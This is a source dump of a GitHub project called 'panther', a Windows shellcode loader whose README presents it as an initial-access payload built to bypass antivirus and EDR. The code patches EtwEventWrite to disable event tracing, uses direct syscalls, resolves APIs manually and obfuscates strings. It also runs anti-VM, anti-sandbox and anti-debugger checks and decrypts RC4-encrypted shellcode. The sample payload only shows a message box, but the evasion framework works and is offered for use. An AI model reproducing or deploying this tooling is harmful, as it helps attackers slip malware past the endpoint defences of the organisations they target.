├── start.png
├── panther
    ├── panther.rc
    ├── payload.bin
    ├── panther.vcxproj.user
    ├── headers.h
    ├── resource.h
    ├── gate.asm
    ├── etw.h
    ├── crypt.h
    ├── helpers.h
    ├── main.cpp
    ├── rc4.h
    ├── panther.vcxproj.filters
    ├── customs.h
    ├── defs.h
    ├── shellc.h
    ├── sandbox_debugging.h
    ├── panther.vcxproj
    ├── gate.h
    └── gate_structs.h
├── README.md
└── panther.sln


/start.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/panther/main/start.png


--------------------------------------------------------------------------------
/panther/panther.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/panther/main/panther/panther.rc


--------------------------------------------------------------------------------
/panther/payload.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/panther/main/panther/payload.bin


--------------------------------------------------------------------------------
/panther/panther.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/panther/headers.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <Windows.h>
 4 | #include <iostream>
 5 | #include <stdarg.h>
 6 | 
 7 | #include <Shlwapi.h>
 8 | #include <Psapi.h>
 9 | #include <tchar.h>
10 | 
11 | #define STATUS_SUCCESS                          ((NTSTATUS)0x00000000L) // ntsubauth
12 | 
13 | #include "gate_structs.h"
14 | 
15 | #pragma comment(lib, "shlwapi.lib")


--------------------------------------------------------------------------------
/panther/resource.h:
--------------------------------------------------------------------------------
 1 | //{{NO_DEPENDENCIES}}
 2 | // Microsoft Visual C++ generated include file.
 3 | // Used by panther.rc
 4 | //
 5 | #define IDR_SCODE1                      101
 6 | 
 7 | // Next default values for new objects
 8 | // 
 9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE        102
12 | #define _APS_NEXT_COMMAND_VALUE         40001
13 | #define _APS_NEXT_CONTROL_VALUE         1001
14 | #define _APS_NEXT_SYMED_VALUE           101
15 | #endif
16 | #endif
17 | 


--------------------------------------------------------------------------------
/panther/gate.asm:
--------------------------------------------------------------------------------
 1 | .data
 2 | 	wSystemCall DWORD 000h
 3 | 
 4 | .code 
 5 | 	CreateGate PROC
 6 | 		nop
 7 | 		nop
 8 | 		nop
 9 | 		mov wSystemCall, 000h
10 | 		nop
11 | 		nop
12 | 		nop
13 | 		mov wSystemCall, ecx
14 | 		nop
15 | 		nop
16 | 		nop
17 | 		ret
18 | 	CreateGate ENDP
19 | 
20 | 	GateDescent PROC
21 | 		nop
22 | 		nop
23 | 		nop
24 | 		mov rax, rcx
25 | 		nop
26 | 		nop
27 | 		nop
28 | 		mov r10, rax
29 | 		nop
30 | 		nop
31 | 		nop
32 | 		mov eax, wSystemCall
33 | 		nop
34 | 		nop
35 | 		nop
36 | 		syscall
37 | 		ret
38 | 	GateDescent ENDP
39 | end


--------------------------------------------------------------------------------
/panther/etw.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include "headers.h"
 3 | #include "helpers.h"
 4 | #include "defs.h"
 5 | 
 6 | BOOL DisableETW();
 7 | 
 8 | BOOL DisableETW() {
 9 | 
10 | 	BOOL res = FALSE;
11 | 	DWORD lpflOldProtect = 0;
12 | 
13 | 	const char* ret = "\xc3";
14 | 
15 | 	FARPROC etw = GetNTAPIAddress(strEtwEventWrite);
16 | 	if (etw == NULL) {
17 | 		return res;
18 | 	}
19 | 
20 | 	if (VirtualProtect(etw, sizeof(ret), PAGE_READWRITE, &lpflOldProtect) != 0) {
21 | 		printf("[+] Modified ETW event write address ->	\t( RW )\n");
22 | 
23 | 		ZwMoveMemory(etw, (const PVOID)ret, sizeof(ret));
24 | 		
25 | 		if (VirtualProtect(etw, sizeof(ret), lpflOldProtect, &lpflOldProtect) != 0) {
26 | 			res = TRUE;
27 | 		}
28 | 		else {
29 | 			return res;
30 | 		}
31 | 	}
32 | 	else {
33 | 		return res;
34 | 	}
35 | 
36 | 	return res;
37 | }


--------------------------------------------------------------------------------
/panther/crypt.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include "headers.h"
 4 | #include "helpers.h"
 5 | #include "defs.h"
 6 | #include "rc4.h"
 7 | 
 8 | BOOL f_SysCrypt032(void* addrMem, DWORD sizeMem, char* key, SIZE_T sizeKey);
 9 | 
10 | BOOL f_SysCrypt032(void* addrMem, DWORD sizeMem, char* key, SIZE_T sizeKey) {
11 | 
12 | 	BOOL res = FALSE;
13 | 
14 | 	ustring _data;
15 | 	ustring _key;
16 | 	
17 | 	t_FreeLibrary C_FreeLibrary = (t_FreeLibrary)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strFreeLibrary);
18 | 	t_LoadLibraryW C_LoadLibraryW = (t_LoadLibraryW)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strLoadLibraryW);
19 | 
20 | 	HMODULE hAdvapi32 = C_LoadLibraryW(wstradvapi32dll);
21 | 
22 | 	_data.Buffer = (PUCHAR)addrMem;
23 | 	_data.Length = sizeMem;
24 | 
25 | 	_key.Buffer = (PUCHAR)key;
26 | 	_key.Length = (DWORD)sizeKey;
27 | 	
28 | 	NTSTATUS status = NULL;
29 | 
30 | 	status = SystemFunction032(&_data, &_key);
31 | 	if (status == STATUS_SUCCESS) {
32 | 		res = TRUE;
33 | 	}
34 | 	else {
35 | 		return res;
36 | 	}
37 | 
38 | 	C_FreeLibrary(hAdvapi32);
39 | 	
40 | 	return res;
41 | 	
42 | 
43 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # panther
 2 | 
 3 | Panther is a C based initial access payload which attempts to bypass AV and EDR. The success rate of bypassing these security defense tool will vary depending on implementation, detection capabilities and similar functionality.
 4 | 
 5 | ![](./start.png)
 6 | 
 7 | Panther includes features such as:
 8 | 
 9 | - Anti-analysis protection
10 | - Anti-VM protection
11 | - Sandbox environment checks
12 | - Direct Syscalls (Hell's Gate)
13 | - Memory hiding
14 | - Shellcode encryption (RC4) 
15 | 
16 | If you want to add more arrays for a string you can use the following script:
17 | - [format_to_char_array.py](https://gist.github.com/Kr0ff/a7441e296c15efdf737ed9d36ae71497)
18 | 
19 | If a shellcode is too large that it can't fit on the stack, you can use the .RSRC section of PE to store your payload. For this purpose you need to encrypt the shellcode and save it to a file in a raw format and place it in the folder of the payload as a `.bin` format.
20 | The `payload.bin` contains a shellcode for `MessageBox()` that will display `Hello World !`. The contents of `shellc.h` are of unencrypted and encrypted shellcode of `MessageBox`.
21 | 
22 | # Disclaimer
23 | The author of this code is not liable for how this program is used by third-parties !


--------------------------------------------------------------------------------
/panther/helpers.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include "headers.h"
 4 | #include "defs.h"
 5 | #include "customs.h"
 6 | 
 7 | FARPROC GetK32APIAddress(char* APIName);
 8 | FARPROC GetNTAPIAddress(char* APIName);
 9 | 
10 | PVOID ZwMoveMemory(
11 | 	_Inout_ PVOID dest,
12 | 	_In_    const PVOID src,
13 | 	_In_    SIZE_T len
14 | );
15 | 
16 | FARPROC GetK32APIAddress(char* APIName) {
17 | 
18 | 	FARPROC addr = NULL;
19 | 	HMODULE hModule = NULL;
20 | 
21 | 	hModule = C_GetModuleHandle(wstrkernel32);
22 | 	if (hModule == NULL) {
23 | 		return NULL;
24 | 	}
25 | 
26 | 	addr = C_GetProcAddr(hModule, APIName);
27 | 	if (addr == NULL) {
28 | 		return NULL;
29 | 	}
30 | 
31 | 	return addr;
32 | }
33 | 
34 | FARPROC GetNTAPIAddress(char* APIName) {
35 | 
36 | 	FARPROC addr = NULL;
37 | 	HMODULE hModule = NULL;
38 | 
39 | 	hModule = C_GetModuleHandle(wstrntdll);
40 | 	if (hModule == NULL) {
41 | 		return NULL;
42 | 	}
43 | 
44 | 	addr = C_GetProcAddr(hModule, APIName);
45 | 	if (addr == NULL) {
46 | 		return NULL;
47 | 	}
48 | 
49 | 	return addr;
50 | 
51 | 	return NULL;
52 | }
53 |  
54 | PVOID ZwMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
55 | 	char* d = (char*)dest;
56 | 	char* s = (char*)src;
57 | 
58 | 	if (d < s)
59 | 		while (len--)
60 | 			*d++ = *s++;
61 | 	else {
62 | 		char* lasts = s + (len - 1);
63 | 		char* lastd = d + (len - 1);
64 | 		while (len--)
65 | 			*lastd-- = *lasts--;
66 | 	}
67 | 	return dest;
68 | }


--------------------------------------------------------------------------------
/panther.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.4.33205.214
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "panther", "panther\panther.vcxproj", "{6756201D-5C39-49CE-B4E2-FBB706196E81}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{6756201D-5C39-49CE-B4E2-FBB706196E81}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{6756201D-5C39-49CE-B4E2-FBB706196E81}.Debug|x64.Build.0 = Debug|x64
18 | 		{6756201D-5C39-49CE-B4E2-FBB706196E81}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{6756201D-5C39-49CE-B4E2-FBB706196E81}.Debug|x86.Build.0 = Debug|Win32
20 | 		{6756201D-5C39-49CE-B4E2-FBB706196E81}.Release|x64.ActiveCfg = Release|x64
21 | 		{6756201D-5C39-49CE-B4E2-FBB706196E81}.Release|x64.Build.0 = Release|x64
22 | 		{6756201D-5C39-49CE-B4E2-FBB706196E81}.Release|x86.ActiveCfg = Release|Win32
23 | 		{6756201D-5C39-49CE-B4E2-FBB706196E81}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {0AD62D29-05F4-48EA-A69E-6A4D34E1C546}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/panther/main.cpp:
--------------------------------------------------------------------------------
 1 | #include "headers.h"
 2 | #include "etw.h"
 3 | #include "shellc.h"
 4 | #include "sandbox_debugging.h"
 5 | #include "gate.h"
 6 | #include "crypt.h"
 7 | 
 8 | //int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
 9 | int main(void) {
10 | 
11 | 	
12 | 	if (VMUserCheck() == FALSE)
13 | 		printf("[CHECK] Not running under VM or sandbox user context\n");
14 | 	else
15 | 		return -94; 
16 | 	
17 | 	if (VMHostnameCheck() == FALSE)
18 | 		printf("[CHECK] Not running in a sandbox environment\n");
19 | 	else
20 | 		return -95;
21 | 
22 | 	// Disable ETW
23 | 	BOOL r_etw = DisableETW();
24 | 	if (r_etw == TRUE) { printf("[+] ETW Disabled\n"); }
25 | 	
26 | 	INT analysis_tools = analysis_tools_process();
27 | 	if (analysis_tools == 1) {
28 | 		printf("\t[!] Found analysis tools\n");
29 | 		return -99;
30 | 	}
31 | 	else {
32 | 		printf("\t[+] No analysis tools\n");
33 | 	}
34 | 
35 | 	if (IsDebugged() == FALSE) {
36 | 		printf("[+] No debugger attached (CHECK 1)\n");
37 | 
38 | 		if (IsDebuggedPEB() == FALSE) {
39 | 			printf("[+] No debugger attached (CHECK 2 PEB)\n");
40 | 			
41 | 			if (IsRemoteDebuggerPresent() == FALSE) {
42 | 				printf("[+] No debugger attached (CHECK 3 REMOTE)\n");
43 | 			} 
44 | 			else {
45 | 				printf("[!] Program is being debugged (CHECK 3)\n");
46 | 				return -98;
47 | 			}
48 | 		}
49 | 		else {
50 | 			printf("[!] Program is being debugged (CHECK 2)\n");
51 | 			return -97;
52 | 		}
53 | 	}
54 | 	else {
55 | 		printf("[!] Program is being debugged (CHECK 1)\n");
56 | 		return -96;
57 | 	}
58 | 	
59 | 	GateSmasher();
60 | 
61 | 	return 0;
62 | }


--------------------------------------------------------------------------------
/panther/rc4.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | //https://source.winehq.org/source/dlls/advapi32/crypt_arc4.c
 4 | 
 5 | #include "headers.h"
 6 | #include "ntstatus.h"
 7 | #include "defs.h"
 8 | #define WIN32_NO_STATUS
 9 | 
10 | typedef struct tag_arc4_info {
11 |     unsigned char state[256];
12 |     unsigned char x, y;
13 | } arc4_info;
14 | 
15 | static void arc4_init(arc4_info* a4i, const BYTE* key, unsigned int keyLen)
16 | {
17 |     unsigned int keyIndex = 0, stateIndex = 0;
18 |     unsigned int i, a;
19 | 
20 |     a4i->x = a4i->y = 0;
21 | 
22 |     for (i = 0; i < 256; i++)
23 |         a4i->state[i] = i;
24 | 
25 |     for (i = 0; i < 256; i++)
26 |     {
27 |         a = a4i->state[i];
28 |         stateIndex += key[keyIndex] + a;
29 |         stateIndex &= 0xff;
30 |         a4i->state[i] = a4i->state[stateIndex];
31 |         a4i->state[stateIndex] = a;
32 |         if (++keyIndex >= keyLen)
33 |             keyIndex = 0;
34 |     }
35 | }
36 | 
37 | static void arc4_ProcessString(arc4_info* a4i, BYTE* inoutString, unsigned int length)
38 | {
39 |     BYTE* const s = a4i->state;
40 |     unsigned int x = a4i->x;
41 |     unsigned int y = a4i->y;
42 |     unsigned int a, b;
43 | 
44 |     while (length--)
45 |     {
46 |         x = (x + 1) & 0xff;
47 |         a = s[x];
48 |         y = (y + a) & 0xff;
49 |         b = s[y];
50 |         s[x] = b;
51 |         s[y] = a;
52 |         *inoutString++ ^= s[(a + b) & 0xff];
53 |     }
54 | 
55 |     a4i->x = x;
56 |     a4i->y = y;
57 | }
58 | 
59 | /******************************************************************************
60 |  * SystemFunction032  [ADVAPI32.@]
61 |  *
62 |  * Encrypts a string data using ARC4
63 |  *
64 |  * PARAMS
65 |  *   data    [I/O] data to encrypt
66 |  *   key     [I] key data
67 |  *
68 |  * RETURNS
69 |  *  Success: STATUS_SUCCESS
70 |  *  Failure: STATUS_UNSUCCESSFUL
71 |  *
72 |  * NOTES
73 |  *  see http://web.it.kth.se/~rom/ntsec.html#crypto-strongavail
74 |  */
75 | NTSTATUS WINAPI SystemFunction032(struct ustring* data, const struct ustring* key)
76 | {
77 |     arc4_info a4i;
78 | 
79 |     arc4_init(&a4i, key->Buffer, key->Length);
80 |     arc4_ProcessString(&a4i, data->Buffer, data->Length);
81 | 
82 |     return STATUS_SUCCESS;
83 | }


--------------------------------------------------------------------------------
/panther/panther.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <ClInclude Include="defs.h">
24 |       <Filter>Header Files</Filter>
25 |     </ClInclude>
26 |     <ClInclude Include="headers.h">
27 |       <Filter>Header Files</Filter>
28 |     </ClInclude>
29 |     <ClInclude Include="helpers.h">
30 |       <Filter>Header Files</Filter>
31 |     </ClInclude>
32 |     <ClInclude Include="crypt.h">
33 |       <Filter>Header Files</Filter>
34 |     </ClInclude>
35 |     <ClInclude Include="ntstatus.h">
36 |       <Filter>Header Files</Filter>
37 |     </ClInclude>
38 |     <ClInclude Include="sandbox_debugging.h">
39 |       <Filter>Header Files</Filter>
40 |     </ClInclude>
41 |     <ClInclude Include="gate.h">
42 |       <Filter>Header Files</Filter>
43 |     </ClInclude>
44 |     <ClInclude Include="gate_structs.h">
45 |       <Filter>Header Files</Filter>
46 |     </ClInclude>
47 |     <ClInclude Include="resource.h">
48 |       <Filter>Header Files</Filter>
49 |     </ClInclude>
50 |     <ClInclude Include="customs.h">
51 |       <Filter>Header Files</Filter>
52 |     </ClInclude>
53 |     <ClInclude Include="rc4.h">
54 |       <Filter>Header Files</Filter>
55 |     </ClInclude>
56 |   </ItemGroup>
57 |   <ItemGroup>
58 |     <MASM Include="gate.asm">
59 |       <Filter>Source Files</Filter>
60 |     </MASM>
61 |   </ItemGroup>
62 |   <ItemGroup>
63 |     <ResourceCompile Include="panther.rc">
64 |       <Filter>Resource Files</Filter>
65 |     </ResourceCompile>
66 |   </ItemGroup>
67 |   <ItemGroup>
68 |     <None Include="payload.bin">
69 |       <Filter>Resource Files</Filter>
70 |     </None>
71 |   </ItemGroup>
72 | </Project>


--------------------------------------------------------------------------------
/panther/customs.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include "headers.h"
 4 | 
 5 | #define STRUCTS
 6 | 
 7 | HMODULE C_GetModuleHandle(LPCWSTR lpModuleName);
 8 | 
 9 | HMODULE C_GetModuleHandle(LPCWSTR lpModuleName) {
10 | 
11 |     HMODULE moduleHandle = NULL;
12 | 
13 | #ifdef _WIN64
14 |     PPEB			pPeb = (PEB*)(__readgsqword(0x60));
15 | #elif _WIN32
16 |     PPEB			pPeb = (PEB*)(__readfsdword(0x30));
17 | #endif
18 | 
19 |     PPEB_LDR_DATA pLdr = pPeb->LdrData;
20 | 
21 |     PLDR_DATA_TABLE_ENTRY pLdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pLdr->InMemoryOrderModuleList.Flink;
22 | 
23 |     while (pLdrDataTableEntry) {
24 | 
25 |         if (pLdrDataTableEntry->FullDllName.Length != NULL) {
26 | 
27 |             if (lstrcmpiW((LPCWSTR)pLdrDataTableEntry->FullDllName.Buffer, lpModuleName) == 0) {
28 |                 
29 | #ifdef STRUCTS
30 |                 return (HMODULE)(pLdrDataTableEntry->InInitializationOrderLinks.Flink);
31 | #else
32 |                 return (HMODULE)pLdrDataTableEntry->Reserved2[0];
33 | #endif
34 |             }
35 | 
36 |         }
37 |         else {
38 |             break;
39 |         }
40 | 
41 |         pLdrDataTableEntry = *(PLDR_DATA_TABLE_ENTRY*)(pLdrDataTableEntry);
42 | 
43 |     }
44 | 
45 |     return NULL;
46 | 
47 | }
48 | 
49 | //--------------------------------------------------
50 | 
51 | FARPROC C_GetProcAddr(HMODULE lphModule, LPCSTR lpFunctionName);
52 | 
53 | FARPROC C_GetProcAddr(HMODULE lphModule, LPCSTR lpFunctionName) {
54 | 
55 |     FARPROC pFunctionAddress = NULL;
56 | 
57 |     HMODULE pBase = lphModule;
58 | 
59 |     if (pBase == NULL)
60 |     {
61 |         return NULL;
62 |     }
63 | 
64 |     PIMAGE_DOS_HEADER pDosHeaders = (PIMAGE_DOS_HEADER)pBase;
65 |     PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((unsigned char*)pDosHeaders + pDosHeaders->e_lfanew);
66 |     PIMAGE_OPTIONAL_HEADER pOptionalHeaders = (PIMAGE_OPTIONAL_HEADER)&pNtHeaders->OptionalHeader;
67 |     PIMAGE_DATA_DIRECTORY pDataDirectory = &(pOptionalHeaders->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
68 |     PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((unsigned char*)pBase + pDataDirectory->VirtualAddress);
69 | 
70 |     DWORD numberOfNames = pExportDirectory->NumberOfNames;
71 | 
72 |     PDWORD ExportAddressTable = (PDWORD)((unsigned char*)pBase + pExportDirectory->AddressOfFunctions);
73 | 
74 |     PWORD NameOrdinalArrays = (PWORD)((unsigned char*)pBase + pExportDirectory->AddressOfNameOrdinals);
75 | 
76 |     PDWORD exportNamePointerTable = (PDWORD)((unsigned char*)pBase + pExportDirectory->AddressOfNames);
77 | 
78 |     DWORD FunctionNameIndex = 0;
79 |     for (FunctionNameIndex = 0; FunctionNameIndex < numberOfNames; FunctionNameIndex++)
80 |     {
81 | 
82 |         char* ModuleFunctionName = (char*)((unsigned char*)pBase + exportNamePointerTable[FunctionNameIndex]);
83 |         if (lstrcmpiA(lpFunctionName, ModuleFunctionName) == 0)
84 |         {
85 |             WORD ordinal = NameOrdinalArrays[FunctionNameIndex];
86 |             PDWORD targetFunctionAddress = (PDWORD)((unsigned char*)pBase + ExportAddressTable[ordinal]); 
87 |             pFunctionAddress = (FARPROC)targetFunctionAddress;
88 |         }
89 |     }
90 | 
91 |     if (pFunctionAddress == NULL) {
92 |         return NULL;
93 |     }
94 |     else {
95 |         return pFunctionAddress;
96 |     }
97 | }


--------------------------------------------------------------------------------
/panther/defs.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // DLL
 4 | char strntdll[] = { 'n','t','d','l','l','.','d','l','l', 0x0 };
 5 | WCHAR wstrntdll[] = { 'n','t','d','l','l','.','d','l','l', 0x0 };
 6 | char strkernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };
 7 | WCHAR wstrkernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };
 8 | char stradvapi32dll[] = { 'a','d','v','a','p','i','3','2','.','d','l','l', 0x0 };
 9 | WCHAR wstradvapi32dll[] = { 'a','d','v','a','p','i','3','2','.','d','l','l', 0x0 };
10 | char strWtsApi32dll[] = { 'W','t','s','A','p','i','3','2','.','d','l','l', 0x0 };
11 | WCHAR wstrWtsApi32dll[] = { 'W','t','s','A','p','i','3','2','.','d','l','l', 0x0 };
12 | 
13 | // NT
14 | char strNtAllocateVirtualMemory[] = { 'N','t','A','l','l','o','c','a','t','e','V','i','r','t','u','a','l','M','e','m','o','r','y', 0x0 };
15 | char strEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };
16 | 
17 | // Kernel32
18 | char strIsDebuggerPresent[] = { 'I','s','D','e','b','u','g','g','e','r','P','r','e','s','e','n','t', 0x0 };
19 | char strCheckRemoteDebuggerPresent[] = { 'C','h','e','c','k','R','e','m','o','t','e','D','e','b','u','g','g','e','r','P','r','e','s','e','n','t', 0x0 };
20 | char strGetUserNameA[] = { 'G','e','t','U','s','e','r','N','a','m','e','A', 0x0 };
21 | char strGetComputerNameA[] = { 'G','e','t','C','o','m','p','u','t','e','r','N','a','m','e','A', 0x0 };
22 | char strVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
23 | char strFindResourceW[] = { 'F','i','n','d','R','e','s','o','u','r','c','e','W', 0x0 };
24 | char strLoadResource[] = { 'L','o','a','d','R','e','s','o','u','r','c','e', 0x0 };
25 | char strLockResource[] = { 'L','o','c','k','R','e','s','o','u','r','c','e', 0x0 };
26 | char strSizeofResource[] = { 'S','i','z','e','o','f','R','e','s','o','u','r','c','e', 0x0 };
27 | char strFreeResource[] = { 'F','r','e','e','R','e','s','o','u','r','c','e', 0x0 };
28 | char strLoadLibraryW[] = { 'L','o','a','d','L','i','b','r','a','r','y','W', 0x0 };
29 | char strFreeLibrary[] = { 'F','r','e','e','L','i','b','r','a','r','y', 0x0 };
30 | 
31 | // WTSAPI32
32 | char strwtsEnumProc[] = { 'W','T','S','E','n','u','m','e','r','a','t','e','P','r','o','c','e','s','s','e','s','A' };
33 | WCHAR wstrwtsEnumProc[] = { 'W','T','S','E','n','u','m','e','r','a','t','e','P','r','o','c','e','s','s','e','s','A' };
34 | 
35 | 
36 | typedef HRSRC (WINAPI* t_FindResourceW)(
37 | 	_In_opt_ HMODULE hModule,
38 | 	_In_ LPCWSTR lpName,
39 | 	_In_ LPCWSTR lpType
40 | );
41 | 
42 | typedef HGLOBAL (WINAPI* t_LoadResource)(
43 | 	_In_opt_ HMODULE hModule,
44 | 	_In_ HRSRC hResInfo
45 | );
46 | 
47 | typedef LPVOID (WINAPI* t_LockResource)(
48 | 	_In_ HGLOBAL hResData
49 | );
50 | 
51 | typedef DWORD (WINAPI* t_SizeofResource)(
52 | 	_In_opt_ HMODULE hModule,
53 | 	_In_ HRSRC hResInfo
54 | );
55 | 
56 | typedef BOOL (WINAPI* t_FreeResource)(
57 | 	_In_ HGLOBAL hResData
58 | );
59 | 
60 | typedef HMODULE (WINAPI* t_LoadLibraryW)(
61 | 	_In_ LPCWSTR lpLibFileName
62 | );
63 | 
64 | typedef BOOL (WINAPI* t_FreeLibrary)(
65 | 	_In_ HMODULE hLibModule
66 | );
67 | 
68 | // SYSFUNC
69 | // char strSystemFunction032[] = { 'S','y','s','t','e','m','F','u','n','c','t','i','o','n','0','3','2', 0x0 };
70 | 
71 | struct ustring {
72 | 	DWORD Length;
73 | 	DWORD MaximumLength;
74 | 	PUCHAR Buffer;
75 | } _data, key;


--------------------------------------------------------------------------------
/panther/shellc.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
 4 | // MessageBox (Unencrypted)
 5 | //Payload size : 434 bytes
 6 | /*
 7 | unsigned char payload[] =
 8 | "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
 9 | "\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
10 | "\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
11 | "\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
12 | "\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
13 | "\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D"
14 | "\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B"
15 | "\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61"
16 | "\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33"
17 | "\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F"
18 | "\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00"
19 | "\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F"
20 | "\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60"
21 | "\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24"
22 | "\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27"
23 | "\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7"
24 | "\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33"
25 | "\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C"
26 | "\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED"
27 | "\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45"
28 | "\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C"
29 | "\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48"
30 | "\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6"
31 | "\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B"
32 | "\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B"
33 | "\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C"
34 | "\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44"
35 | "\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6"
36 | "\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";
37 | */
